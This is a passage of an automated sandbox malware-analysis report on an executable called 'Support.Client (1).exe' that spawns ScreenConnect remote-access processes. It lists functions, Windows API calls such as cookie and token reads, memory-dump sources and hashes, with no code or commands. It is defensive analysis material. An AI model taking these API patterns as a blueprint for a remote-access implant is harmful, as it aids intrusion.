Opcode ID: 3671a8dccd5b4007263d474448287447cd07f50c06350920d64c9ffbd65665df
Instruction ID: 82d5a18964f4c6f1d3d8d144283d22753ce7cdb6271a81b7a5351cf40e6c46bc
Opcode Fuzzy Hash: 3671a8dccd5b4007263d474448287447cd07f50c06350920d64c9ffbd65665df
Instruction Fuzzy Hash: C7017572702A657F27221A667C4CC7B6A6DDEC2BA43D5013AF908C3240EB788C0281B8

Function 004244A8 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,004247FE,00427E79,?,0042686F,?,00000004,00000000,?,?,?,00423BCD,?,00000000), ref: 004244AD
_free.LIBCMT ref: 004244E2
_free.LIBCMT ref: 00424509
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00424516
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0042451F

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 8eb1fdd336dea6cc5bcad4a04c00cc0f18d9564a643a8907da8ebfccec4419ab
Instruction ID: e99ed73fcaa6222dee10d22b21de4bbaf805ce98e4620ce9faabff198f88654d
Opcode Fuzzy Hash: 8eb1fdd336dea6cc5bcad4a04c00cc0f18d9564a643a8907da8ebfccec4419ab
Instruction Fuzzy Hash: 3901F976300670B7822676367D45E2B272DEBC17B97E0013BFA59D2292EF7C8D42406D

Function 00426176 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0042618E

Part of subcall function 00424869: HeapFree.KERNEL32(00000000,00000000,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?), ref: 0042487F
Part of subcall function 00424869: GetLastError.KERNEL32(?,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?,?), ref: 00424891

_free.LIBCMT ref: 004261A0
_free.LIBCMT ref: 004261B2
_free.LIBCMT ref: 004261C4
_free.LIBCMT ref: 004261D6

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f85a43c78bd7f5ecccc03cb94bf4a3344c81138b74ea6d53df33b723bc24fe16
Instruction ID: cbcd7cb791dd0b09f27ebb70906fd1e2cc3397d49d66cf559f26eb7b66d7796c
Opcode Fuzzy Hash: f85a43c78bd7f5ecccc03cb94bf4a3344c81138b74ea6d53df33b723bc24fe16
Instruction Fuzzy Hash: 3EF06836714260AF86A4EB56F582C2777DDEA807143D91C1BF409D7651C738FC40865C

Function 00423D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00423DAD

Part of subcall function 00424869: HeapFree.KERNEL32(00000000,00000000,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?), ref: 0042487F
Part of subcall function 00424869: GetLastError.KERNEL32(?,?,0042620D,?,00000000,?,00000000,?,00426234,?,00000007,?,?,0042669F,?,?), ref: 00424891

_free.LIBCMT ref: 00423DBF
_free.LIBCMT ref: 00423DD2
_free.LIBCMT ref: 00423DE3
_free.LIBCMT ref: 00423DF4

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a4a982a61dad7ac9bca01f091c3c8cb8b63ebca906cc5edbeacae9fc5fcfe89f
Instruction ID: 600acb9ff128b24a9a0e448866cf5a2d338541e117c1d62a480fb5c1bfdacb17
Opcode Fuzzy Hash: a4a982a61dad7ac9bca01f091c3c8cb8b63ebca906cc5edbeacae9fc5fcfe89f
Instruction Fuzzy Hash: FFF03478A20270EFDB896F16FE019093B70EB85720380267BF4029A3B1CB7919419FCC

Function 00422F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Support.Client (1).exe,00000104), ref: 00422F93
_free.LIBCMT ref: 0042305E
_free.LIBCMT ref: 00423068

Strings

C:\Users\user\Desktop\Support.Client (1).exe, xrefs: 00422F8A, 00422F91, 00422FC0, 00422FF8

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Support.Client (1).exe
API String ID: 2506810119-452514669
Opcode ID: a832c935db1bed4e1b0af8374b5790d9e2de22be246fcdd31bd4338c06dee36b
Instruction ID: 4be21d417e7685e0a2de2e2a88c960536eda5c9533a6247a8c571754fc7ad7a4
Opcode Fuzzy Hash: a832c935db1bed4e1b0af8374b5790d9e2de22be246fcdd31bd4338c06dee36b
Instruction Fuzzy Hash: 7F318371B00224AFCB21DF9AED8199EBBBCEB85714F50406BF40497211DA789E41DB69

Function 004225E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00422594,00000000,?,00431B50,?,?,?,00422737,00000004,InitializeCriticalSectionEx,0042BC48,InitializeCriticalSectionEx), ref: 004225F0
GetLastError.KERNEL32(?,00422594,00000000,?,00431B50,?,?,?,00422737,00000004,InitializeCriticalSectionEx,0042BC48,InitializeCriticalSectionEx,00000000,?,004224C7), ref: 004225FA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00422622

Strings

api-ms-, xrefs: 00422607

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f36f2e69bd96db05430d549d2cb2231e072278eaad4646374fb35df1312951d3
Instruction ID: a7e4ea4d3d6ba9eefb8b51c01ccdd47aac4aa14c5ada66e1c86c46400e784b3e
Opcode Fuzzy Hash: f36f2e69bd96db05430d549d2cb2231e072278eaad4646374fb35df1312951d3
Instruction Fuzzy Hash: 83E01231740214BBEF221B61FC06B5A3F55EB10B51F904431FA0DA81A1EBAAA95595CC

Function 004257DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00425784,00000000,00000000,00000000,00000000,?,00425981,00000006,FlsSetValue), ref: 0042580F
GetLastError.KERNEL32(?,00425784,00000000,00000000,00000000,00000000,?,00425981,00000006,FlsSetValue,0042C4D8,FlsSetValue,00000000,00000364,?,004244F6), ref: 0042581B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00425784,00000000,00000000,00000000,00000000,?,00425981,00000006,FlsSetValue,0042C4D8,FlsSetValue,00000000), ref: 00425829

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ed41957885dfdc0fa1c905dd1288480f7fd798ccc45d130d27eb6a7c2b0eb78b
Instruction ID: 165f1b4e3ac122ab58ea2584740746ab494f3914b26284ec9c362cffdeb6b51e
Opcode Fuzzy Hash: ed41957885dfdc0fa1c905dd1288480f7fd798ccc45d130d27eb6a7c2b0eb78b
Instruction Fuzzy Hash: 1C014732705632ABC7315A68BC44A577798EF047A0BA10535FE1AD3240CB74DC12C6EC

Function 00424EBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,00425147,?), ref: 00424EE9
GetACP.KERNEL32(00000000,?,?,00425147,?), ref: 00424F00

Strings

GQB, xrefs: 00424ED7

Memory Dump Source

Source File: 00000000.00000002.2519841524.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true

Associated: 00000000.00000002.2519500622.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520093669.000000000042B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520228428.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2520255754.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_Support.jbxd

Similarity

API ID:
String ID: GQB
API String ID: 0-2984644350
Opcode ID: e3ae4935b11d4a9a2b4b86eab386f4871d14621e212ee5630a0c48d1da129cce
Instruction ID: 804b56cb9f92917ba9ddaeb9d009a3798ccb866aadb5e5f8ccd2822257fc1911
Opcode Fuzzy Hash: e3ae4935b11d4a9a2b4b86eab386f4871d14621e212ee5630a0c48d1da129cce
Instruction Fuzzy Hash: 24F0AF31A001149BDB21CB68FC087A97770FB81339FA10359E4388BAE1CB796841CB99

Analysis Process: dfsvc.exePID: 7076, Parent PID: 6884COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	113
Total number of Limit Nodes:	10

Executed Functions

Function 00007FFD9B891538 Relevance: 1.9, APIs: 1, Instructions: 372
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFD9B891827

Memory Dump Source

Source File: 00000001.00000002.3534340694.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d0b5b662567bd4d250de2ebc3bd93767516a86d1d933c8f756559ae452d980a3
Instruction ID: 514c8bf99413b5c077aba9d93c08b8205790e825f412e38614e2485bf4d15fbe
Opcode Fuzzy Hash: d0b5b662567bd4d250de2ebc3bd93767516a86d1d933c8f756559ae452d980a3
Instruction Fuzzy Hash: 74B15B22B0FBC91FDB56DBBC48692A87FD1EF56350B0941BFD049C71E7EA2899068341

Function 00007FFD9B89E8E2 Relevance: 1.8, APIs: 1, Instructions: 280
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetGetCookieW.WININET ref: 00007FFD9B89EAC6

Memory Dump Source

Source File: 00000001.00000002.3534340694.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CookieInternet
String ID:
API String ID: 930238652-0
Opcode ID: c83e75b744971c3a95d053f3f63c573c851bab8f1fafd7f97961de738137adf4
Instruction ID: 47a02eec8434eeac9701fef066ea15e06d09ca9098b0d8775bc2b1bdfbf5f728
Opcode Fuzzy Hash: c83e75b744971c3a95d053f3f63c573c851bab8f1fafd7f97961de738137adf4
Instruction Fuzzy Hash: 02910130608B8D8FDB69DF28C8557E53BE1FF59311F05426FE84DC72A2CA74A9458B81

Function 00007FFD9B89994B Relevance: 1.7, APIs: 1, Instructions: 177
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFD9B899A7C

Memory Dump Source

Source File: 00000001.00000002.3534340694.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7365f226cb2cf13c1b3ac58113278fc50321f1c391d6ec612affabc212c29e01
Instruction ID: 97a0f8969ced5a5332147a6fc03c4a999323a72a02ba1be4d3c637d95c522ed9
Opcode Fuzzy Hash: 7365f226cb2cf13c1b3ac58113278fc50321f1c391d6ec612affabc212c29e01
Instruction Fuzzy Hash: C1519F31A0CA5C8FDB68DF589855BE9BBE0FF59310F1442AEE04DD3252CB34A9818B81

Function 00007FFD9B77EEC0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3533813972.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b77d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9e407a9d55c7632e041c956c1a443c14120492a7318802e2cd2bffbe1711ec
Instruction ID: a517500f710b2f2e42e40076224ee41b2a1fac6ef7d3547a6561d788a155ad39
Opcode Fuzzy Hash: 7a9e407a9d55c7632e041c956c1a443c14120492a7318802e2cd2bffbe1711ec
Instruction Fuzzy Hash: C541187190EBC44FE3969B3898959523FF0EF57320B1502EFD088CB1B3D665A846C7A2

Analysis Process: ScreenConnect.WindowsClient.exePID: 4820, Parent PID: 7076COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8BF67B Relevance: 1.7, APIs: 1, Instructions: 178
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B8BF7AC

Memory Dump Source

Source File: 00000006.00000002.1945422057.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5d7597cb1efaa75f7d7f00b8b92a860baea5caf1f84f4bcaa05a4967e0ab0813
Instruction ID: 7e3ac7653cf8115ca7909cabb0d743f253cb3602e0c7adc4d059d7ac6b672700
Opcode Fuzzy Hash: 5d7597cb1efaa75f7d7f00b8b92a860baea5caf1f84f4bcaa05a4967e0ab0813
Instruction Fuzzy Hash: DA518071A0CA5C8FDB68DF68D845BA9BBE0FB59310F1442AEE04DD3252DB34A945CB81

Function 00007FFD9B8B4992 Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD9B8CF2A6

Memory Dump Source

Source File: 00000006.00000002.1945422057.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 1d07ef2c01ab1c70d87cd3318eed88dd1ba7f1a026d30b47b191d8aeb6057481
Instruction ID: e16e0b71a6d25e835bf5db472da815c1e594e6dad25c25f5919c0199ffee0206
Opcode Fuzzy Hash: 1d07ef2c01ab1c70d87cd3318eed88dd1ba7f1a026d30b47b191d8aeb6057481
Instruction Fuzzy Hash: 7431E47191CB188FDB18DF5CE8466FD77E0EB99321F10422FE049D3251DB74A8068B82

Function 00007FFD9B8B3EAA Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8B8542

Memory Dump Source

Source File: 00000006.00000002.1945422057.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 336e64a946c3fd2094ac03cb6fe0104bed56899daa5f311e797220e8c511efc9
Instruction ID: 34ba3ea9a2d332690da6f45bffed745168eeb3a79de8899c2cfeeb24e806a263
Opcode Fuzzy Hash: 336e64a946c3fd2094ac03cb6fe0104bed56899daa5f311e797220e8c511efc9
Instruction Fuzzy Hash: 9721B97191CB188FDB289F9DDC4AAF977E0EB69711F00413EE049D3251DB74B8468B91

Function 00007FFD9B8B84B8 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8B8542

Memory Dump Source

Source File: 00000006.00000002.1945422057.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 8ed60e62ea8efcf9e101709eea1d57bf52ec464e7518be2354b8763d57343db7
Instruction ID: c4d0fbd93d60971d3d9860caa5ef8447cc152d96e0232133d552cdc627616bac
Opcode Fuzzy Hash: 8ed60e62ea8efcf9e101709eea1d57bf52ec464e7518be2354b8763d57343db7
Instruction Fuzzy Hash: BD21E971918B188FDB189F9CDC4A9F97BE0EB69711F00413EE049D3252DB74B846CB92

Function 00007FFD9B8B3DFA Relevance: 1.3, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00007FFD9B8CF4BC

Memory Dump Source

Source File: 00000006.00000002.1945422057.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3c3959bf9b19116470b07f89e2e93cab7c64d39b2325b82b62a0e93028c8e638
Instruction ID: 1ba09d873c481133ae02a7c4fd5d8ae8291d7a877e276bc09bd114c3f7ca1f00
Opcode Fuzzy Hash: 3c3959bf9b19116470b07f89e2e93cab7c64d39b2325b82b62a0e93028c8e638
Instruction Fuzzy Hash: 4421C471908A1C9FDB58DF98D445BF977E0EB69321F00422FD049D3291DB74A856CB91

Analysis Process: ScreenConnect.ClientService.exePID: 4416, Parent PID: 4820COMMON

Executed Functions

Function 016D2013 Relevance: 2.9, Strings: 2, Instructions: 416COMMON

Download Yara Rule

Strings

, xrefs: 016D237E
nCvq, xrefs: 016D2351

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq$
API String ID: 0-222869378
Opcode ID: 5ba4d93cb397c11a3e561a1da0db6e0a794ad8aee7f5efccc1967855f9bc474b
Instruction ID: 76a720a79d858ef60e72df9258f9b4290c013bb0a95856d97024db1580debfee
Opcode Fuzzy Hash: 5ba4d93cb397c11a3e561a1da0db6e0a794ad8aee7f5efccc1967855f9bc474b
Instruction Fuzzy Hash: C271CF30B042058FCB16AF78DC6866EBBF2EB85214B1480ADD906DB36ADF74DD45CB91

Function 016D1828 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

$^q, xrefs: 016D188D
$^q, xrefs: 016D1899

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 134a300fcd107b4b423b827d41950b83f8d91caf8ed05ada3f315e147d0ce357
Instruction ID: 0f6002e13d17256420b800b49980d1a664fd568833d5aa145e9aa190b329df41
Opcode Fuzzy Hash: 134a300fcd107b4b423b827d41950b83f8d91caf8ed05ada3f315e147d0ce357
Instruction Fuzzy Hash: B8018431A05344CFC71A9B34D8188157FB5EF4721131684EEE4058F366CB769C85CB51

Function 016D5238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

(bq, xrefs: 016D525A

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 2f180c4c468621605faa920cfce6a1782b77b84ad95227a7eeddacfdd1d5b399
Instruction ID: 8719fb3fa3b22282898bace3f79654023cc1fcdb123b7c095bf8753907a6e71c
Opcode Fuzzy Hash: 2f180c4c468621605faa920cfce6a1782b77b84ad95227a7eeddacfdd1d5b399
Instruction Fuzzy Hash: EF61E234B106058FCB14DFA9D89496EB7F2FF89315B1181A9E606AB365DB30ED05DB80

Function 016D6F41 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

LR^q, xrefs: 016D70CB

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: f452fd4b94748a7ad6f6ecc2c3e5d286a1abf86641280ece94ed9defb7b8367b
Instruction ID: b0f3399f189863d0e748b451fd2359b8c82556829c82224c6e6dd619359f9033
Opcode Fuzzy Hash: f452fd4b94748a7ad6f6ecc2c3e5d286a1abf86641280ece94ed9defb7b8367b
Instruction Fuzzy Hash: 8451EC70E002119FDB259B78DC54B6EBBE2BB84718F18856EE446DB3A1DB319C45CB82

Function 016D42F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 016D4311

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: d3dae242acd78a1dae88d48be84fd19a81b2f65c706860564fb718715895d329
Instruction ID: bcad26f7645311b89a4c270849832880316c30fbf1ef32ece4e833d2bb108ee5
Opcode Fuzzy Hash: d3dae242acd78a1dae88d48be84fd19a81b2f65c706860564fb718715895d329
Instruction Fuzzy Hash: FD419030A00106CBCF15EF69E99466DBBA6FF84311B19C16AD9069B359DF34EC46CB90

Function 016D3480 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

[', xrefs: 016D3548

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: d7840ecbc68b3d10abbcd404431ed8dd040dcb7b557262ec8bb009e3ee704b13
Instruction ID: 0553b86ebdbb769beeddae628ad94f8b62c68c88ac9dae27646562dd7f4e9f25
Opcode Fuzzy Hash: d7840ecbc68b3d10abbcd404431ed8dd040dcb7b557262ec8bb009e3ee704b13
Instruction Fuzzy Hash: 7D31DC71B002029FC705AB7C989086EBBE6FBC8254340893AD51ADB364EF74DD498FE1

Function 016D4940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19ac03101d72e9af47f3a62fd6303e3e4f17a608f3411f9e69c5ab3804aca6a
Instruction ID: 01c27f0d5bf48f9eda7e1577ff3602c7b751845565f4655d061b6926c1a9ec2a
Opcode Fuzzy Hash: e19ac03101d72e9af47f3a62fd6303e3e4f17a608f3411f9e69c5ab3804aca6a
Instruction Fuzzy Hash: 41511D34A006018FC724CF29D884A56B7F2FF8D325B185A6DE596DBBA8DB31EC45CB44

Function 016D7770 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd31c2ac7c3b1707a2fe6e6389e38b6fb4a5bc2c6e24dc0fdf1786b408bdc36b
Instruction ID: ebc130783d79b8bd7cdc13d55e10d876f182337f42c284401945e89041b12608
Opcode Fuzzy Hash: dd31c2ac7c3b1707a2fe6e6389e38b6fb4a5bc2c6e24dc0fdf1786b408bdc36b
Instruction Fuzzy Hash: 8B512830E10209DFDB05DFB8D844B9DBBB2FF88300F109569E505BB264DB79A989CB91

Function 016D776C Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2581c2c1d4f929eca60d3ba476888cf677c845d03c32b3428c843c9604042c0
Instruction ID: 0d8b70bb1710577b461a84dd699c9a7c63582f6399526b203a89b719910cabfe
Opcode Fuzzy Hash: d2581c2c1d4f929eca60d3ba476888cf677c845d03c32b3428c843c9604042c0
Instruction Fuzzy Hash: 35512730E10209DFDB01DFB8D944B9DBBB2FF88300F109569E505BB264DB79A989CB91

Function 016D366C Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1931971999.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin
